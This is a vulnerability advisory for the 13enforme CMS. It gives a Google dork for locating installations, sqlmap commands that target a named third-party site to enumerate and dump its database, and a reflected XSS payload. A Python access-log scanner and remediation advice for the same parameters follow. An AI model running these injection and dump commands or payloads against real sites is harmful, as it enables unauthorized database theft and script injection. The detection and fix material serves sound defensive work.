# Exploit Title: 13enforme CMS SQL Injection & XSS Vulnerability
# Google Dork: intext:"13enForme" +inurl:.php?id=
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: http://www.13enforme.com
# Version: 1
# Tested on: Ubuntu

---------------------------------------------------------

PoC 1:
Once the attacker locates the SQL injection vulnerability, they can use an automated process to exploit it in the web app.
Payload(s):

http://www.site.com/content.php?id=[]'[SQL INJECTION VULNERABILITY!]

SQLMAP Payload(s):

sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D db538822134 --tables

sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D db538822134 -T plv




PoC 2:

XSS Vulnerability

Payload(s):

"><img src=x onerror=prompt(document.domain);>

Use payload:

https://www.example/content.php?id=5&lg=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E

www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>
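
A defensive check for the two parameters the PoCs above abuse, as an added example (not part of the original advisory or the CMS's own code): it scans web-server access logs for content.php requests whose id is not a plain integer or whose lg is not a short language code. The allowed formats for id and lg, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Apr/2020:10:00:01 +0000] "GET /content.php?id=99 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [03/Apr/2020:10:00:07 +0000] "GET /content.php?id=99%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [03/Apr/2020:10:00:09 +0000] "GET /content.php?id=99/**/aNd/**/1/**/bEtWeEn/**/1/**/aNd/**/1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [03/Apr/2020:10:02:40 +0000] "GET /content.php?id=5&lg=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E HTTP/1.1" 200 5240 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Apr/2020:10:03:11 +0000] "GET /content.php?id=5&lg=fr HTTP/1.1" 200 5201 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ID_OK = re.compile(r"\d{1,10}")       # assumption: id is a numeric record key
LG_OK = re.compile(r"[A-Za-z]{2,5}")  # assumption: lg is a short language code


def check_line(line):
    """Return (client_ip, findings) for a content.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/content.php"):
        return None
    # parse_qs percent-decodes, so %27 and %22%3E are checked in decoded form.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    if any(not ID_OK.fullmatch(v) for v in params.get("id", [])):
        findings.append("id-not-numeric")
    if any(not LG_OK.fullmatch(v) for v in params.get("lg", [])):
        findings.append("lg-not-language-code")
    return client, findings


def scan(lines):
    """Map client IP -> sorted findings, omitting clients with none."""
    hits = {}
    for line in lines:
        result = check_line(line)
        if result and result[1]:
            hits.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(found) for ip, found in hits.items()}


if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(found))
```

Because the check is an allowlist on the decoded value, it flags the tamper-encoded request the same way as the plain quote. The same allowlist belongs in the application itself, together with a parameterized query for id and HTML-encoding of lg on output.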